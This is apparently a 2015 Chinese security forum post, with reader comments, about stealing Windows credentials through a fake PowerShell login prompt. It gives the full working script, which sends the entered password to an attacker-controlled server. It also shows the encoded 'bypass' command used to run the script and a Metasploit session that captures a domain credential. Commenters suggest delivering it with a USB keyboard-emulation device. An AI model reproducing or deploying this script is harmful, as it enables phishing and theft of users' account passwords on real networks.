Powershell Popups + Capture
五道口杀气 | 2015-01-13 18:17
英文原文:Powershell Popups + Capture
这个方法优势就是可以不产生任何文件,可以获取任何权限用户的认证信息
不需要管理员权限,不需要绕过UAC。
原理就是利用powershell脚本制造一个假的登陆界面,管理员登陆之后会把密码发送到我们的服务器上。
这里接收密码是使用的metasploit。
powershell脚本:
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');
172.16.102.163为我们接受的地址。
cat power.txt | iconv --to-code UTF-16LE | base64
把代码生成base64.
然后执行
powershell -ep bypass -enc <base64编码的代码>
metasploit接收密码:
root@wpad:~/metasploit-framework# ./msfconsole -Lq msf > use auxiliary/server/capture/http_basic msf auxiliary(http_basic) > show options Module options (auxiliary/server/capture/http_basic): Name Current Setting Required Description ---- --------------- -------- ----------- REALM Secure Site yes The authentication realm you'd like to present. RedirectURL no The page to redirect users to after they enter basic auth creds SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) msf auxiliary(http_basic) > set SSL true SSL => true msf auxiliary(http_basic) > set SRVPORT 443 SRVPORT => 443 msf auxiliary(http_basic) > set URIPATH / URIPATH => / msf auxiliary(http_basic) > run [*] Auxiliary module execution completed msf auxiliary(http_basic) > [*] Listening on 0.0.0.0:443... [*] Using URL: https://0.0.0.0:443/ [*] Local IP: https://172.16.102.163:443/ [*] Server started. [*] 172.16.102.140 http_basic - Sending 401 to client 172.16.102.140 [+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => /
各种吐槽:
1#
YY-2012 (#)<alert("living")>(#) | 2015-01-13 18:26
so 吊
2#
Kavia (求工作求收留) | 2015-01-13 18:40
mark
3#
Chu (学习ing。) | 2015-01-13 18:42
在hak5 上看到了,感觉挺棒的
4#
xsser (十根阳具有长短!!) | 2015-01-13 18:42
这玩意太牛了
5#
insight-labs (Root Yourself in Success) | 2015-01-13 19:05
猥琐淫荡……
6#
RainShine (I'm your angel of music.) | 2015-01-13 19:52
so diao...
7#感谢(1)
Jeremy | 2015-01-13 19:57
《论ctrl+alt+del的重要性》
8#
ACGT | 2015-01-13 20:49
懒得自己写的话,对付xp可以用这个
http://exploit.co.il/hacking/windows-domain-credentials-phishing-tool/
9#
Anymous (听说集齐7枚wb能召唤神龙,兑换树莓派,点击右边感谢收集wb,召唤神龙!) | 2015-01-13 21:01
powershell的,可以放到HID键盘攻击
http://zone.wooyun.org/content/17931
找人插一下它
10#
Anymous (听说集齐7枚wb能召唤神龙,兑换树莓派,点击右边感谢收集wb,召唤神龙!) | 2015-01-13 21:02
好像有点鸡肋
11#
%230CC (Who's Your Daddy ---lordi) | 2015-01-14 11:28
在详细讲一下 怎么把MSF接进去吧。。。
12#
_Evil (科普是一种公益行为) | 2015-01-14 14:16
好玩的东西
13#
冷冷的夜 (预备唱:希望你过的没我好,死得比我早,吃不好也睡不) | 2015-01-14 16:02
room362 必须是干货啊,就是更新频率太慢了
14#
Ano_Tom | 2015-01-14 16:17
666
15#
疯狗 (阅尽天下漏洞,心中自然无码。) | 2015-01-14 16:33
powershell太强了,这思路太牛了啊。。。cmd哭晕在厕所